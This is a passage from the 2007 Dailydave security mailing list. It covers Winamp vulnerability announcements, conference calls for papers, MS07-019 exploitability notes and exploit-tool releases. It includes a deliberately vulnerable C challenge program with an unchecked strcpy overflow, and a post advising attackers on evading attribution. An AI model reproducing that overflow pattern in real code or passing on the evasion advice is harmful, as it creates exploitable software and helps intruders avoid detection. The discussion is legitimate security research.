a likely suspect. It will take time to develop this profile method from empirical to practical. And it leaves me wondering: can stereotyping network attacks be turned into something more definitive? Thanks to the Internet Storm Center for their feedback and valuable comments. - - Dr. Neal Krawetz, PhD -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkYTo/sACgkQDpFP8dW5K4bbCwP/SK5F6ECFRIhdi+DPzkbKkmv6y1gP 2TgX8i3gLKecdA816GX5FxqnyFIlBlSRPPcOEZYz6/ELBlAhBCFpieJo+ep4OUMFWM/z j/81D1Hjjxoq1NMnQpvszI7RYx1xqW/MWqrk7FPXFnM01yZjUD+AvHOpJaA1XXUiiABQ ogvw6ow= =kxgE -----END PGP SIGNATURE----- -- Click to get free info on how to start processing credit cards http://tagline.hushmail.com/fc/CAaCXv1ImjntF9mE1kTybJAC7Ifj9haN/ From bania.piotr at gmail.com Fri Apr 6 05:46:53 2007 From: bania.piotr at gmail.com (Piotr Bania) Date: Fri, 06 Apr 2007 11:46:53 +0200 Subject: [Dailydave] AOL Nullsoft Winamp LIBSNDFILE.DLL Remote Memory Corruption (Off By Zero) Message-ID: <4616170D.6090309@gmail.com> AOL Nullsoft Winamp LIBSNDFILE.DLL Remote Memory Corruption (Off By Zero) by Piotr Bania http://www.piotrbania.com Severity: Critical - Possible remote code execution. Software affected: Tested on AOL Nullsoft Winamp v5.33 (x86) Feb 13 2007 (on Windows XP SP1/SP2). There exist a large possiblity that any other software that is using the LIBSNDFILE.DLL component should be considered as vulnerable. Orginal url: http://www.piotrbania.com/all/adv/nullsoft-winamp-libsndfile-adv.txt best regards, pb -- -------------------------------------------------------------------- Piotr Bania - - 0xCD, 0x19 Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33 http://www.piotrbania.com - Key ID: 0xBE43AC33 -------------------------------------------------------------------- - "The more I learn about men, the more I love dogs." From bania.piotr at gmail.com Fri Apr 6 05:47:12 2007 From: bania.piotr at gmail.com (Piotr Bania) Date: Fri, 06 Apr 2007 11:47:12 +0200 Subject: [Dailydave] AOL Nullsoft Winamp IT Module "IN_MOD.DLL" Remote Heap Memory Corruption Message-ID: <46161720.4020507@gmail.com> AOL Nullsoft Winamp IT Module "IN_MOD.DLL" Remote Heap Memory Corruption by Piotr Bania http://www.piotrbania.com Severity: Important - Potencial remote code execution. Software affected: Tested on AOL Nullsoft Winamp v5.33 (x86) Feb 13 2007 (on Windows XP SP1/SP2). Orginal url: http://www.piotrbania.com/all/adv/nullsoft-winamp-it_module-in_mod-adv.txt best regards, pb -- -------------------------------------------------------------------- Piotr Bania - - 0xCD, 0x19 Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33 http://www.piotrbania.com - Key ID: 0xBE43AC33 -------------------------------------------------------------------- - "The more I learn about men, the more I love dogs." From bania.piotr at gmail.com Fri Apr 6 05:47:04 2007 From: bania.piotr at gmail.com (Piotr Bania) Date: Fri, 06 Apr 2007 11:47:04 +0200 Subject: [Dailydave] AOL Nullsoft Winamp S3M Module "IN_MOD.DLL" Remote Heap Memory Corruption Message-ID: <46161718.5020808@gmail.com> AOL Nullsoft Winamp S3M Module "IN_MOD.DLL" Remote Heap Memory Corruption by Piotr Bania http://www.piotrbania.com Severity: Important - Potencial remote code execution. Software affected: Tested on AOL Nullsoft Winamp v5.33 (x86) Feb 13 2007 (on Windows XP SP1/SP2). Orginal url: http://www.piotrbania.com/all/adv/nullsoft-winamp-s3m_module-in_mod-adv.txt best regards, pb -- -------------------------------------------------------------------- Piotr Bania - - 0xCD, 0x19 Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33 http://www.piotrbania.com - Key ID: 0xBE43AC33 -------------------------------------------------------------------- - "The more I learn about men, the more I love dogs." From dave at immunityinc.com Sat Apr 7 13:29:21 2007 From: dave at immunityinc.com (Dave Aitel) Date: Sat, 07 Apr 2007 13:29:21 -0400 Subject: [Dailydave] Opsec for Hackers aka "Don't pee in your own pool" Message-ID: <4617D4F1.8010202@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 http://blog.wired.com/27bstroke6/2007/04/court_okays_cou.html """ The case began in December 1999, when an official at Qualcomm in San Diego detected a hack attack against the company's system, and notified both the FBI, and administrators at the apparent source of the attack -- the University of Wisconsin at Madison. UWisc system administrator Jeffrey Savoy tracked the intrusion to Heckenkamp's dorm computer, and then determined that Heckencamp was also trying to hack into the university's mail server. Savoy blocked the hacker's IP address, which ended in 117, but Heckenkamp, being a pretty smart guy, changed it. That's when Savoy turned the tables and counter-cracked the suspect computer, supposedly for the limited purpose of determining if it really was the same system with a different IP address, and to protect the university server from further attack """ Opsec is hard, and one of the hardest things about it is that it contradicts the naturally aggressive tendencies a hacker must have to be successful. Most hackers spend most of their time prepping and building a tool-chain.[1] Once they have a decent capability, they find that everything looks like a target. Every hotel they stay at has a vulnerable machine they could use as a bounce-point later. Every airport they fly through. Their neighbors. Their schools. Having a good tool-chain means that their technical operational security is air-tight. Chances of getting caught for any one (or any large group) of attacks is reasonably low. But what they do when they hack things they are close to is create a signature for themselves in what the .mil likes to term "the information battlespace". Good opsec requires that nothing connected to the hacker personally is ever touched, no matter how tempting. You never own anything you would care about. Don't pee in your own pool. - -dave [1] A tool-chain differs from a "tool kit" in that it is an integrated and linked set of tools that take you from recon to penetration to long term data exfiltration. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGF9TwtehAhL0gheoRArBkAJ0YZMbrpVPWUM3jbGfAzZFoOkInaQCdGX6S BwzpeZq2qXt0kq4tkM9qhK4= =VLdT -----END PGP SIGNATURE----- From dtangent at defcon.org Mon Apr 9 21:43:03 2007 From: dtangent at defcon.org (The Dark Tangent) Date: Mon, 09 Apr 2007 18:43:03 -0700 Subject: [Dailydave] DEF CON One Five CfP in effect! Message-ID: <200704100143.l3A1hoOB008165@colossus.datamerica.com> Hey Daily Dave readers, here is a (long) version of the DEF CON CfP announcemet. DEFCON 15 Call For Papers is now officially Open and will close on June 15, 2007. Don't know what DEFCON is? Go to https://www.defcon.org/ and clue up! Papers and presentations are now being accepted for DEFCON 15, the conference your mother and ISC(2) warned you about. DEFCON will take place at the Riviera in Las Vegas, NV, USA, August 3-5, 2007. Last year, we eliminated speaking tracks, and we received a diverse selection of submissions. From hacking your car, your brain, and CIA sculptures to hacking the vote, Bluetooth, and DNS hacks. We group presentations by subject and come up with topic areas of interest. It worked out so well in the past we are doing it again. What are we looking for then, if we don't have tracks? Were looking for the presentation that you've never seen before and have always wanted to see. We are looking for the presentation that the attendees wouldn't ask for, but blows their minds when they see it. We want strange demos of Personal GPS jammers, RFID zappers, and HERF madness. Got a MITM attack against cell phones? We want to see it. Subjects that we have traditionally covered in the past, and will continue to accept include: Trojan development, worms, malware, intelligent agents, protocol exploits, application security, web security, database hacking, privacy issues, criminal law, civil law, international law/treaties, prosecution perspectives, 802.11X, bluetooth, cellular telephony protocols, privacy, identity theft, identity creation, fraud, social implications of technology, media/film presentations, firmware hacking, hardware hacking, embedded systems hacking, smartcard technologies, credit card and financial instrument technologies, surveillance, counter-surveillance, UFO's, peer2peer technologies, reputation systems, copyright infringement and anti-copyright infringement enforcement technologies, critical infrastructure issues, physical security, social engineering, academic security research, PDA and cell phone security, EMP/HERF weaponry, TEMPEST technologies, corporate espionage, IDS evasion. What a mouth full! Well you can't say we didn't give you some ideas. This list is not intended to limit possible topics, merely to give examples of topics that have interested us in the past, and is in fact the same list we used last year.. Check out https://www.defcon.org/html/defcon-14/dc-14-speakers.html for past conference presentations to get a complete list of past topics that were accepted if you want to learn from the past. We are looking for and give preference to: unique research, new tool releases, ? day attacks (with responsible disclosure), highly technical material, social commentaries, and ground breaking material of any kind. Want to screen a new hacking documentary or release research? Consider DEFCON. Speaking Formats: Choose between 12 hundred seconds, 50 minutes, 110 minutes, or a break out format of a length you determine. We are continuing the Twelve Hundred Second Spotlight, which is a shorter presentation (about twenty minutes) that doesn't warrant a full 50 or 110 minute talk. The Twelve Hundred Second Spotlight is designed for those who don't have enough material for a full talk, but still have a valuable contribution to make. This is to ensure that great ideas that can be presented quickly don't fall through the cracks merely because they didn't justify a full length talk. Examples include research, announcements, group presentations, projects needing volunteers or testers, requests for comments, updates on previously given talks, quick demonstrations. You get the idea. Presenters will get a speaker badge which entitles them to free admittance to DEFCON, but we will be unable to pay an Honorarium. Remember being attacked by flying meat? Do you remember thick accented Germans trying to convince you to attack critical infrastructure? Do you remember extravagant vapor ware releases by a stage filled with posses? We do, and sans projectiles of raw meat we want to encourage such shenanigans again this year. We are calling on all "hacker groups" (you know who you are, and the FBI has a nifty file with your name on it) to present at DEFCON, to discuss what you're up to, what your mission is, to discuss any upcoming or past projects, and to discuss parties/conferences you are throwing. We do humbly request that all gang warfare be relegated to electronic attacks, and not fall over into meat space. New for DEFCON 15: The second year being at the Riviera has allowed us to make some changes to the format from last year. We have more speaking rooms, and because of this I want to announce a call for workshops, demos, and mini trainings. We have additional small rooms that will enable highly focused demonstrations or workshops. If you want to talk about building a passport cloner or a tutorial on developing Metasploit exploits this might be the format for you. You tell us how much time you need, and we try to accommodate you! To submit a speech Complete the Call for Papers Form at: https://www.defcon.org/html/defcon-15/dc-15-cfp-form.html and send to talks at defcon dot org. You will receive a confirmation within 48 hours of submission. We are going to continue last year's goal of increasing the quality of the talks by screening people and topics. I realize you guys are speaking for basically free, but some talks are better than others. Some people put in a bit more effort than others. I want to reward the people who do the work by making sure there is room for them. This year we will have two rounds of speaker acceptance. In the first round we will fill about half of the schedule before the submission deadline, and the remaining half afterwards. This is to encourage people to submit as early as possible and allows attendees to plan on the topics that interest them. If you see the schedule on-line start to fill, do not worry if you have not heard from us yet, as we are still in the process of selection. Barring a disaster of monstrous proportions, speaker selection will be completed no later July 1. The sooner you submit the better chance you have of the reviewers to give your presentation the full consideration it warrants. If you wait until the last minute to submit, you have less of a chance of being selected. After a completed CFP form is received, speakers will be contacted if there are any questions about their presentations. If your talk is accepted you can continue to modify and evolve it up until the last minute, but don't deviate from your accepted presentation. We will mail you with information on deadlines for when we need your presentation, to be burnt on the CDROM, as well as information for the printed program. Speakers get in to the show free, get paid (AFTER they give a good presentation!), get a coolio badge, and people like you more. Heck, most people find it is a great way to meet people or find other people interested in their topics. Speakers can opt to forgo their payment and instead receive three human badges that they can give to their friends, sell to strangers, or hold onto as timeless mementoes. Receiving badges instead of checks has been a popular option for those insisting on maintaining their anonymity. Please visit: https://www.defcon.org/ for previous conference archives, information, and speeches. Updated announcements will be posted to news groups, security mailing lists and this web site. https://forum.defcon.org/ for a look at all the events and contests being planned for DEFCON 15. Join in on the action. https://pics.defcon.org/ to upload all your past DEFCON pictures. We store the pictures so you don't have to worry about web space. If you have an account on the forums, you have an account here. https://www.defcon.org/defconrss.xml for news and announcements surrounding DEFCON. CFP forms and questions should get mailed to: talks/at/defcon.org Thanks! The Dark Tangent From dan at geer.org Mon Apr 9 22:40:52 2007 From: dan at geer.org (dan at geer.org) Date: Mon, 09 Apr 2007 22:40:52 -0400 Subject: [Dailydave] DEF CON One Five CfP in effect! In-Reply-To: Your message of "Mon, 09 Apr 2007 18:43:03 PDT." <200704100143.l3A1hoOB008165@colossus.datamerica.com> Message-ID: <20070410024052.0D1D01BF905@absinthe.tinho.net> A curiousity question that I've been meaning to ask... This is the Nth time that DefCon has scheduled directly over USENIX Security. The latter, which honestly commands my first loyalty, publicly sets its meeting dates literally years in advance -- I know as I was on the Board for a decade. DefCon, to this casual observer, seems to prefer an element of surprise. Of course, one can argue that the attendees and thus the meetings don't overlap but that is to split the hair between choosing overlap in time (which precludes overlapping in attendees) and choosing to overlapp in attendees (which precludes overlapping in time). And it is not just USENIX Security; this overlap also encompasses the Electronic Voting Technology Workshop, the HotSec Workshop, and the Metricon 2.0 Workshop as well. Of course, one can argue that with DefCon running August 4-6 and USENIX running August 6-10 that the meetings don't strictly overlap, but for anyone with a travel budget (or a life) this sounds like overlap to me. Besides, if you wanna claim that your attendees are different than someone else's, why not overlap with SANS instead? Paller is not paying you to do this, is he? --dan From shrdlu at deaddrop.org Mon Apr 9 23:21:31 2007 From: shrdlu at deaddrop.org (Etaoin Shrdlu) Date: Mon, 09 Apr 2007 20:21:31 -0700 Subject: [Dailydave] DEF CON One Five CfP in effect! In-Reply-To: <20070410024052.0D1D01BF905@absinthe.tinho.net> References: <20070410024052.0D1D01BF905@absinthe.tinho.net> Message-ID: <461B02BB.8080006@deaddrop.org> dan at geer.org wrote: >A curiousity question that I've been meaning to >ask... This is the Nth time that DefCon has >scheduled directly over USENIX Security. > Interesting that you'd say Defcon was scheduled over USENIX Security. I always thought of it as the other way around. Having attended for lo these many years, I can assure you that the choice of dates is not cavalier, and because of its success it appears to conflict. For several years now, the sister conference, Blackhat, has taken place during the week, and the scheduling of it certainly also overlaps something or other. Defcon has always been last few days of July, first few days of August. Always. You just have to choose. I choose Defcon; you will probably continue to choose Usenix Security. There you have it. -- It is by caffeine alone I set my mind in motion. It is by the beans of Java that thoughts acquire speed, the hands acquire shaking, the shaking becomes a warning. It is by caffeine only I set my mind in motion. From rthieme at thiemeworks.com Tue Apr 10 12:30:14 2007 From: rthieme at thiemeworks.com (Richard Thieme) Date: Tue, 10 Apr 2007 11:30:14 -0500 Subject: [Dailydave] DEF CON One Five CfP in effect! In-Reply-To: <461B02BB.8080006@deaddrop.org> References: <20070410024052.0D1D01BF905@absinthe.tinho.net> <461B02BB.8080006@deaddrop.org> Message-ID: <461BBB96.6050607@thiemeworks.com> I've been to eleven Def Cons now and this is correct - it has always been scheduled last week of July first week of August and since Def Con 5, which was the first Black Hat, has had to mind the tail that now is a full grown dog ... if someone put all the infosec, infowar, physical security, and homeland defense cons on the calender - would there be ANY open days in the year besides a few holidays? RT Etaoin Shrdlu wrote: > dan at geer.org wrote: > > >> A curiousity question that I've been meaning to >> ask... This is the Nth time that DefCon has >> scheduled directly over USENIX Security. >> >> > > Interesting that you'd say Defcon was scheduled over USENIX Security. I > always thought of it as the other way around. Having attended for lo > these many years, I can assure you that the choice of dates is not > cavalier, and because of its success it appears to conflict. For several > years now, the sister conference, Blackhat, has taken place during the > week, and the scheduling of it certainly also overlaps something or > other. Defcon has always been last few days of July, first few days of > August. Always. > > You just have to choose. I choose Defcon; you will probably continue to > choose Usenix Security. There you have it. > > From dave at immunityinc.com Tue Apr 10 13:04:45 2007 From: dave at immunityinc.com (Dave Aitel) Date: Tue, 10 Apr 2007 13:04:45 -0400 Subject: [Dailydave] Larger scale papers Message-ID: <461BC3AD.7040007@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Exploiting truly large numbers of machines well requires careful engineering. Recently we've put a couple papers on the Immunity Resources section ( http://www.immunityinc.com/resources-papers.shtml ) to detail a lot of the work we've done on the issue. Obviously there's a lot of things you can do in this area, ever since ADMScan and the other mass-owners. But some of these things you can do better. In particular, attacking non-English Windows, and attacking Web Applications. And those two items are discussed in the papers released today, although certainly more work remains to be done. Thanks, Dave Aitel Immunity, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGG8OsB8JNm+PA+iURAhQQAKCsMywViuRM5eNz11GREcu+PsGUIwCfdvoM gCuJpusuaMpFJIrZpe+2Nsg= =sWy/ -----END PGP SIGNATURE----- From dave at immunityinc.com Tue Apr 10 15:15:53 2007 From: dave at immunityinc.com (Dave Aitel) Date: Tue, 10 Apr 2007 15:15:53 -0400 Subject: [Dailydave] Remotes and "remotes" Message-ID: <461BE269.6060501@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Some notes on MS07-019 - we threw a quick and dirty PoC into Partners and Kostya and I have looked at it to see what's up. Three things combine to make it "unexploitable": DEP, SafeSEH, and character filtering. DEP by default is on, since this is svchost.exe. According to Immunity Debugger, SafeSEH protects MOST dll's in the process, so although you can find a few to jump to...DEP protects the stack/heap so jumping directly to shellcode is unadvised, and those DLL's are rarely in the process. Office11, for example, throws an unprotected DLL into the process, but the filtering prevents you from reaching it, let alone using it for anything useful. Filling up the heap MIGHT work, but then DEP screws you again, and the filter makes your life rather hard even without it. Sans Diary has it split out into "Servers and Clients", but I notice that since they have no exploit information at all, they've listed the UPNP bug as Critical on both clients and servers. Of course, it only affects XP SP2. This isn't a server OS, so that doesn't make sense even if it was correct. We can't expect Swa ("the handler on duty" - a somewhat dirty title, no?) to do vulnerability research on each patch before posting the criticality of bugs, can we? My point is this: Not all critical bugs are "Critical". You can save a lot of money for a big organization by knowing which bugs are exploitable, and which ones are not. And kudo's to eEye for the wacky bugs of the month. Those are neat. - -dave [1]. Nothing is truly unexploitable, but let's say that any single exploit costing 150K and 4 months or more to develop into a 30% or less reliable exploit is "unexploitable". And that's where this one is, IMHO. Then again, I'm happy to be proved wrong. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGG+JnB8JNm+PA+iURAq14AKDOWX3jhR8HIs6FxZvDXOMkV2r2hQCeNzj4 lQ5ikOPkajFBn/WrSIzHdvQ= =dWDq -----END PGP SIGNATURE----- From adam at homeport.org Tue Apr 10 16:57:14 2007 From: adam at homeport.org (Adam Shostack) Date: Tue, 10 Apr 2007 16:57:14 -0400 Subject: [Dailydave] DEF CON One Five CfP in effect! In-Reply-To: <461BBB96.6050607@thiemeworks.com> References: <20070410024052.0D1D01BF905@absinthe.tinho.net> <461B02BB.8080006@deaddrop.org> <461BBB96.6050607@thiemeworks.com> Message-ID: <20070410205714.GA17979@homeport.org> In 1999 or 2000, the International Financial Crypto Association looked, and discovered that the calendar was full with events that we thought our target market would care about, and that avoiding overlap was impossible. That was years ago, I assume it's gotten worse as the field has grown. At the same time, I think it would be helpful for the largest events to not overlap. Both Blackhat and Usenix have longstanding hotel commitments which would be challenging to rearrange at short notice, but since neither is going away, when is the first year that one could move? Adam On Tue, Apr 10, 2007 at 11:30:14AM -0500, Richard Thieme wrote: | I've been to eleven Def Cons now and this is correct - it has always | been scheduled last week of July first week of August and since Def Con | 5, which was the first Black Hat, has had to mind the tail that now is a | full grown dog ... | | if someone put all the infosec, infowar, physical security, and homeland | defense cons on the calender - would there be ANY open days in the year | besides a few holidays? | | RT | | | Etaoin Shrdlu wrote: | > dan at geer.org wrote: | > | > | >> A curiousity question that I've been meaning to | >> ask... This is the Nth time that DefCon has | >> scheduled directly over USENIX Security. | >> | >> | > | > Interesting that you'd say Defcon was scheduled over USENIX Security. I | > always thought of it as the other way around. Having attended for lo | > these many years, I can assure you that the choice of dates is not | > cavalier, and because of its success it appears to conflict. For several | > years now, the sister conference, Blackhat, has taken place during the | > week, and the scheduling of it certainly also overlaps something or | > other. Defcon has always been last few days of July, first few days of | > August. Always. | > | > You just have to choose. I choose Defcon; you will probably continue to | > choose Usenix Security. There you have it. | > | > | | _______________________________________________ | Dailydave mailing list | Dailydave at lists.immunitysec.com | http://lists.immunitysec.com/mailman/listinfo/dailydave From dtrammell at tippingpoint.com Tue Apr 10 16:31:00 2007 From: dtrammell at tippingpoint.com (Dustin D. Trammell) Date: Tue, 10 Apr 2007 15:31:00 -0500 Subject: [Dailydave] Security Conferences Calendar (was Re: DEF CON One Five CfP in effect!) In-Reply-To: <461BBB96.6050607@thiemeworks.com> References: <20070410024052.0D1D01BF905@absinthe.tinho.net> <461B02BB.8080006@deaddrop.org> <461BBB96.6050607@thiemeworks.com> Message-ID: <1176237061.6370.255.camel@localhost> On Tue, 2007-04-10 at 11:30 -0500, Richard Thieme wrote: > if someone put all the infosec, infowar, physical security, and homeland > defense cons on the calender - would there be ANY open days in the year > besides a few holidays? Funny you should ask... I happen to maintain one: http://www.google.com/calendar/embed?src=pe2ikdbe6b841od6e26ato0asc% 40group.calendar.google.com As many security related conferences and CFP deadlines as I can get my hands on. And to answer your question, no, there aren't many open days left... And I'm sure I'm missing some. If you happen to notice any I'm missing, feel free to fill me in at this address or at druid at caughq.org. -- Dustin D. Trammell VoIP Security Research TippingPoint, a division of 3Com -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 191 bytes Desc: This is a digitally signed message part Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20070410/140b7b48/attachment.pgp From dtangent at defcon.org Tue Apr 10 19:17:06 2007 From: dtangent at defcon.org (The Dark Tangent) Date: Tue, 10 Apr 2007 16:17:06 -0700 Subject: [Dailydave] DEF CON One Five CfP in effect! In-Reply-To: <461BBB96.6050607@thiemeworks.com> References: <20070410024052.0D1D01BF905@absinthe.tinho.net> <461B02BB.8080006@deaddrop.org> <461BBB96.6050607@thiemeworks.com> Message-ID: <200704102317.l3ANHtjx024087@colossus.datamerica.com> It's definitely not intentional. I was contacted by Usenix last year about coordinating dates, and I let them know our contracted dates for 2007 and 2008. I bet they were already committed, though. Jeff At 09:30 AM 4/10/2007, you wrote: >I've been to eleven Def Cons now and this is correct - it has always >been scheduled last week of July first week of August and since Def Con >5, which was the first Black Hat, has had to mind the tail that now is a >full grown dog ... > >if someone put all the infosec, infowar, physical security, and homeland >defense cons on the calender - would there be ANY open days in the year >besides a few holidays? > >RT From dave.aitel at gmail.com Thu Apr 12 13:02:13 2007 From: dave.aitel at gmail.com (Dave Aitel) Date: Thu, 12 Apr 2007 13:02:13 -0400 Subject: [Dailydave] This ain't a scene, it's a gd arms race. Message-ID: http://beagle.kbs.uni-hannover.de/~beagle/Beagle++%20Demo%20-%20Xvid.avi How cool are the new desktop search tools in Linux? Answer: Gelato in Miami Summer Cool. Imagine if you could hook this up to your hacking tools and browse other people's information streams the way you can browse your own? Seems like it would be pretty easy to do. I should make CANVAS output its knowledge tree to Beagle++ and see what it looks like. -dave -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070412/eb40c955/attachment.htm From dave.aitel at gmail.com Thu Apr 12 15:41:52 2007 From: dave.aitel at gmail.com (Dave Aitel) Date: Thu, 12 Apr 2007 15:41:52 -0400 Subject: [Dailydave] This ain't a scene, it's a gd arms race. In-Reply-To: References: Message-ID: The base page for Beagle ++ is: http://beagle.kbs.uni-hannover.de/ . They claim you need the Xvid codec to view the video properly. It was a bit iffy in on my OS X box until I refreshed it and mussed with it a bit. But it played fine after a few knocks. Essentually the idea is that I download a lot of mailspools, and I want to search them in a "*semantic*" way ("weather" should return emails on "Snow" and "Cold"). Likewise I want the tool to automatically determine the references between people. All the people looking up yellowcake recipies and centrifuges should belong to a group, for example, that gets returned when I search on "Nukes". Nobody's even released a tool that allows you to report on all the normal things you do during a pen test, so I doubt anyone is going to release a specialized data mining tool for hackers anytime soon. But maybe API's like Beagle++ make the development of a special purpose tool unnecessary. -dave On 4/12/07, Dave Aitel wrote: > > http://beagle.kbs.uni-hannover.de/~beagle/Beagle++%20Demo%20-%20Xvid.avi > > How cool are the new desktop search tools in Linux? Answer: Gelato in > Miami Summer Cool. > > Imagine if you could hook this up to your hacking tools and browse other > people's information streams the way you can browse your own? Seems like it > would be pretty easy to do. I should make CANVAS output its knowledge tree > to Beagle++ and see what it looks like. > > -dave > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070412/99ccf464/attachment.htm From dave at immunityinc.com Sat Apr 14 19:07:06 2007 From: dave at immunityinc.com (Dave Aitel) Date: Sat, 14 Apr 2007 19:07:06 -0400 Subject: [Dailydave] Great Black Walruses of the Deep Message-ID: <46215E9A.1080204@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Some bugs are born and die in a flash, and some bugs last forever and then disappear into the deep like a great walrus. Either way, why are people owning universities with really good 0day from IP addresses in Taiwan? I guess we'll never know. This MSDNS bug is one of the few MSRPC bugs that can be found with a MSRPC fuzzer of the sort I demoed in Beijing at XCon. It's a rare animal though. Fuzzing is not a good way to find MSRPC bugs these days. Along with SPIKE 3.0, we released our MSDNS MSRPC exploit today into Partners - exploits Windows 2003 and 2000 reliably, and for bonus points, defeats Wehnus's DLL randomization. Anyways, it's Saturday, I'm in Newark International (motto: "This is not the gate you're looking for") on my way to the great white north to find another walrus or two. - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGIV6ZtehAhL0gheoRAgtJAJ4tI3soycIRcWySUdAizZN53E8heQCdEj/Y 8YwG2wqacqrGapWYd/e+E9k= =Fi2x -----END PGP SIGNATURE----- From dave at immunityinc.com Tue Apr 17 02:06:23 2007 From: dave at immunityinc.com (Dave Aitel) Date: Tue, 17 Apr 2007 02:06:23 -0400 Subject: [Dailydave] Hmph Message-ID: <462463DF.3090605@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I'm off to class - today is niprint day! But I did have a comment on Ryan Naraine's latest article[1], which is this: Hackers don't need hints from Microsoft's advisories. Anyways, all those people with spare time need to step up with their third party patches! Time is of the essence people! Eventually these patches will be put out by the hacker groups themselves, to keep the milw0rm crowd from re-owning their boxes. - -dave [1] http://blogs.zdnet.com/security/?p=167 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGJGPetehAhL0gheoRAt73AJ9SKXbtxwBRPtpXMUu+u9KxqrgIwACeNwyd c9s7HYOfdDXQjHgprm5dFPw= =SwE/ -----END PGP SIGNATURE----- From krahmer at suse.de Tue Apr 17 09:02:32 2007 From: krahmer at suse.de (Sebastian Krahmer) Date: Tue, 17 Apr 2007 15:02:32 +0200 (CEST) Subject: [Dailydave] relro, aslr & stuff Message-ID: Yo, For those who are in Linux exploitation: http://c-skills.blogspot.com/2007/04/relro.html This thing was to expect I think, but it had to be done :) l8er, Sebastian -- ~ ~ perl self.pl ~ $_='print"\$_=\47$_\47;eval"';eval ~ krahmer at suse.de - SuSE Security Team ~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg) From dummychuck at gmail.com Wed Apr 18 01:21:33 2007 From: dummychuck at gmail.com (Tucker Dummychuck) Date: Tue, 17 Apr 2007 22:21:33 -0700 Subject: [Dailydave] Hmph In-Reply-To: <462463DF.3090605@immunityinc.com> References: <462463DF.3090605@immunityinc.com> Message-ID: <94cf67610704172221q1ab680e7p9f88d1c03ab9817a@mail.gmail.com> I'm not sure I see why we need a 3rd-party patch so urgently. The mitigation described by MS works and is fairly painless, so presumably you'd start with that if you are running DNS, and then wait for the patch from MS? I agree that it was only a matter of time before hackers identified the flaw - either using the info on the ISC diary page or from MS's advisory. Perhaps saying that it was a stack BO made it a *little* easier to find, but that would be the obvious thing to start looking for in the first place. Tucker. On 4/16/07, Dave Aitel wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > I'm off to class - today is niprint day! But I did have a comment on > Ryan Naraine's latest article[1], which is this: Hackers don't need > hints from Microsoft's advisories. > > Anyways, all those people with spare time need to step up with their > third party patches! Time is of the essence people! Eventually these > patches will be put out by the hacker groups themselves, to keep the > milw0rm crowd from re-owning their boxes. > > - -dave > [1] http://blogs.zdnet.com/security/?p=167 > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > > iD8DBQFGJGPetehAhL0gheoRAt73AJ9SKXbtxwBRPtpXMUu+u9KxqrgIwACeNwyd > c9s7HYOfdDXQjHgprm5dFPw= > =SwE/ > -----END PGP SIGNATURE----- > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070417/32351812/attachment-0001.htm From je at bitnux.com Wed Apr 18 03:41:07 2007 From: je at bitnux.com (Joel Eriksson) Date: Wed, 18 Apr 2007 09:41:07 +0200 Subject: [Dailydave] relro, aslr & stuff In-Reply-To: References: Message-ID: <20070418074107.GA105@eip.bitnux.com> On Tue, Apr 17, 2007 at 03:02:32PM +0200, Sebastian Krahmer wrote: > > Yo, > > For those who are in Linux exploitation: > > http://c-skills.blogspot.com/2007/04/relro.html On a related note: --- /* * 0xbadc0ded.org Challenge #02 (2003-07-08) * * Joel Eriksson */ #include #include #include unsigned long val = 31337; unsigned long *lp = &val; int main(int argc, char **argv) { unsigned long **lpp = &lp, *tmp; char buf[128]; if (argc != 2) exit(1); strcpy(buf, argv[1]); if (((unsigned long) lpp & 0xffff0000) != 0x08040000) exit(2); tmp = *lpp; **lpp = (unsigned long) &buf; *lpp = tmp; exit(0); } --- I knew the technique would turn out to be useful someday. ;) > l8er, > Sebastian -- Best Regards, Joel Eriksson CTO Bitsec AB From prabu at hackinthebox.org Wed Apr 18 08:40:28 2007 From: prabu at hackinthebox.org (Praburaajan) Date: Wed, 18 Apr 2007 20:40:28 +0800 Subject: [Dailydave] Reminder: HITBSecConf2007 - Malaysia: Call for Papers closing in 2 weeks Message-ID: <462611BC.1050501@hackinthebox.org> Greetings from sunny Malaysia! This is a reminder that the Call for Papers for the upcoming HITBSecConf2007 - Malaysia is closing on the 1st of May. HITBSecConf2007 - Malaysia is set to take place from the 3rd till the 6th of September in Kuala Lumpur. Our event last year attracted over 600 attendees from all corners of the globe and this year we are expecting this number to grow to well over 800. In addition, the event will feature 4 keynote speakers, 40 researchers, 7 tracks of hands-on technical trainings, a dual-track security conference, capture the flag competition, a lock picking village, zone-h/hitb hacking challenge, bzflag competition and one MASSIVE post conference party!!! If you only attend ONE event this year; make sure its HITBSecConf2007 - Malaysia; Asia's largest network security conference! From info.hacklu at gmail.com Wed Apr 18 10:11:17 2007 From: info.hacklu at gmail.com (Hack Lu) Date: Wed, 18 Apr 